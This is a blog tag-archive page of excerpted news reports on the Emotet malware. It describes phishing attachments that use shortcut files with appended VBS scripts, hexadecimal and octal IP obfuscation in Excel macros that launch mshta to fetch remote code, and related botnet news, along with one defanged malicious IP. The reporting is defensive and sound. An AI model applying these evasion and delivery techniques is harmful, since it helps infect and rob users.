Tag: Emotet | Page 3

Emotet malware infects users again after fixing broken installer

April 25, 2022/in Computer Security

Emotet

The Emotet malware phishing campaign is up and running again after the threat actors fixed a bug preventing people from becoming infected when they opened malicious email attachments.

Emotet is a malware infection distributed through spam campaigns with malicious attachments. If a user opens the attachment, malicious macros or scripts will download the Emotet DLL and load it into memory.

Once loaded, the malware will search for and steal emails to use in future spam campaigns and drop additional payloads such as Cobalt Strike or other malware that commonly leads to ransomware attacks.

Buggy attachments broke the Emotet campaign

Last Friday, the Emotet malware distributors launched a new email campaign that included password-protected ZIP file attachments containing Windows LNK (shortcut) files pretending to be Word documents.

**Current Emotet phishing email example**
*Source: Cofense*

When a user double-clicked on the shortcut, it would execute a command that searches the shortcut file for a particular string that contains Visual Basic Script code, appends the found code to a new VBS file, and executes that VBS file, as shown below.

Emotet shortcut commands from Friday's campaign — **Emotet shortcut commands from Friday’s campaign**
*Source: BleepingComputer*

However, this command contained a bug as it used a static shortcut name of ‘Password2.doc.lnk,’ even though the actual name of the attached shortcut file is different, like ‘INVOICE 2022-04-22_1033, USA.doc’.

This caused the command to fail, as the Password2.doc.lnk file did not exist, and thus the VBS file was not created, as explained by the Emotet research group Cryptolaemus.

#emotet Update – As of the last few hours Ivan is running some tests on E4 to try to bypass detection by appending a VBS at the end of an LNK file in a zip. The LNK when launched will find a string in itself and then copy the remainder from that string after to a VBS file. 1/x https://t.co/pEcOWdbfOa

— Cryptolaemus (@Cryptolaemus1) April 22, 2022

Cryptolaemus researcher Joseph Roosen told BleepingComptuer that Emotet shut down the new email campaign at approximately 00:00 UTC on Friday after discovering that the bug was preventing users from becoming infected.

Unfortunately, Emotet fixed the bug today…

Source…

Lokibot Returns to the Index and Emotet Regains Top Spot

February 8, 2022/in Computer Security

Check Point Research reveals that the InfoStealer, Lokibot, is back in the most prevalent malwares list while Emotet has taken first place away from Trickbot. Apache Log4j is still wreaking havoc as the number one most exploited vulnerability.

SAN CARLOS, Calif., Feb. 08, 2022 (GLOBE NEWSWIRE) — Check Point Research, the Threat Intelligence arm of Check Point^® Software Technologies Ltd. (NASDAQ: CHKP), a leading provider of cyber security solutions globally, has published its latest Global Threat Index for January 2022. Researchers report that Emotet has now pushed Trickbot out of first place after a long stay at the top, and is this month’s most prevalent malware, affecting 6% of organizations worldwide. Log4j is also still proving to be a problem, impacting 47.4% of organizations globally and the most attacked industry continues to be Education/Research.

After only two and a half months since its return, Emotet has surged into the top spot. The notorious botnet is most commonly spread via phishing emails that contain malicious attachments or links. Its increased use has only been helped by the prevalence of Trickbot that acts as a catalyst, spreading the malware even further. Meanwhile Dridex has dropped from the top ten list altogether, replaced by Lokibot, an InfoStealer which is used to obtain data such as email credentials, passwords to CryptoCoin wallets and FTP servers.

“It’s unsurprising that Emotet is back with a vengeance. It’s an evasive malware, making it difficult to detect, while the fact that it uses multiple methods to infect networks only further adds to the continuing rise of this threat. It is unlikely that this will be a short-lived problem,” said Maya Horowitz, VP Research at Check Point Software. “This month we’ve also seen Dridex disappear from our top ten list and Lokibot resurface. Lokibot takes advantage of victims at their busiest moments, being distributed through well disguised phishing emails. These threats, alongside the ongoing battle with the Log4j vulnerability, emphasise the importance of having the best security across networks, cloud, mobile and user endpoints.”

Check Point Research (CPR) revealed this month that…

Source…

Trend Micro : Emotet Spam Abuses Unconventional IP Address Formats to Spread Malware

January 21, 2022/in Computer Security

We observed Emotet spam campaigns using hexadecimal and octal representations of IP addresses, likely to evade detection via pattern matching. Both routines use social engineering techniques to trick users into enabling document macros and automate malware execution. Upon receiving these standards, operating systems (OS) automatically convert the values to the dotted decimal quad representation to initiate the request from the remote servers. Users and businesses are cautioned to detect, block, and enable the relevant security measures to prevent compromise using Emotet for second stage delivery of malware such as TrickBot and Cobalt Strike.

Routine using hexadecimal IP addresses

The samples we found start with an email-attached document using Excel 4.0 Macros, a dated feature used to automate repetitive tasks in Excel that malicious actors have abused to deliver malware. Abuse of the feature in this case allows the malware to execute once the document is opened using the auto_open macro.

Figure 1. Attached document in the emails lures users into enabling the macros

The URL is obfuscated with carets and the host contains a hexadecimal representation of the IP address. Using CyberChef, we converted the hexadecimal numbers to find the more commonly used dotted decimal equivalent, 193[.]42[.]36[.]245.

Figure 2. Using carets for obfuscation

Figure 3. Converting the hexadecimal numbers to dotted decimal representation

Once executed, the macro invokes cmd.exe > mshta.exe with the URL containing the hex representation of the IP address as an argument, which will download and execute an HTML application (HTA) code from the remote host.

Figure 4. Downloading and executing an HTA code

Routine using octal IP addresses

Much like the hexadecimal representation sample, the document also uses Excel 4.0 Macros to run the malware once the…

Source…

Cyber Security Today, Dec. 8, 2021 – Microsoft, Google disrupt botnets and worrisome news about Emotet malware

December 8, 2021/in Internet Security

Microsoft and Google disrupt botnets, worrisome news about Emotet malware, and more.

Welcome to Cyber Security Today. It’s Wednesday, December 8th. I’m Howard Solomon, contributing writer on cybersecurity for ITWorldCanada.com.

Some good news to tell you about:

Microsoft has disrupted the activities of a China-based hacking group. This comes after a U.S. court has allowed Microsoft to seize websites of the gang it calls Nickel. The sites were being used to attack organizations in 29 countries, including government agencies, think tanks and human rights organizations. This gang has been operating since 2016, sometimes by compromising a target organization’s VPN, stealing employee passwords by spear phishing or taking advantage of unpatched Microsoft Exchange and SharePoint servers.

Google said it has temporarily disrupted the command and control infrastructure behind a botnet of 1 million compromised Windows devices. It calls the botnet Glupteba. It’s been stealing victims’ passwords, hiding cryptocurrency miners on their computers and running other people’s internet traffic through their computers and routers. What makes this sophisticated botnet different from others is it defends itself with a blockchain-based system that retrieves backup domains through three bitcoin wallets. So Google is trying a long-shot: It’s suing two persons believed to be in Russia for operating the botnet in violation of U.S. law.

Sophisticated Russian-based threat actors allegedly associated with the Nobelium threat group, which was behind the SolarWinds Orion update compromise, have been spotted by researchers at Mandiant. In a report issued this week the company said it is seeing attacks against service providers to get into other organizations. In at least once instance a compromised VPN account was leveraged to get deeper into a company’s IT systems. In another case the attacker accessed the organization’s Microsoft 365 environment using a stolen digital session token. In some cases victims were hit after going to websites offering free or cracked software. Some victims who use smartphone-based multifactor authentication to protect their accounts were fooled by an attack that…

Source…

Tag Archive for: Emotet

Buggy attachments broke the Emotet campaign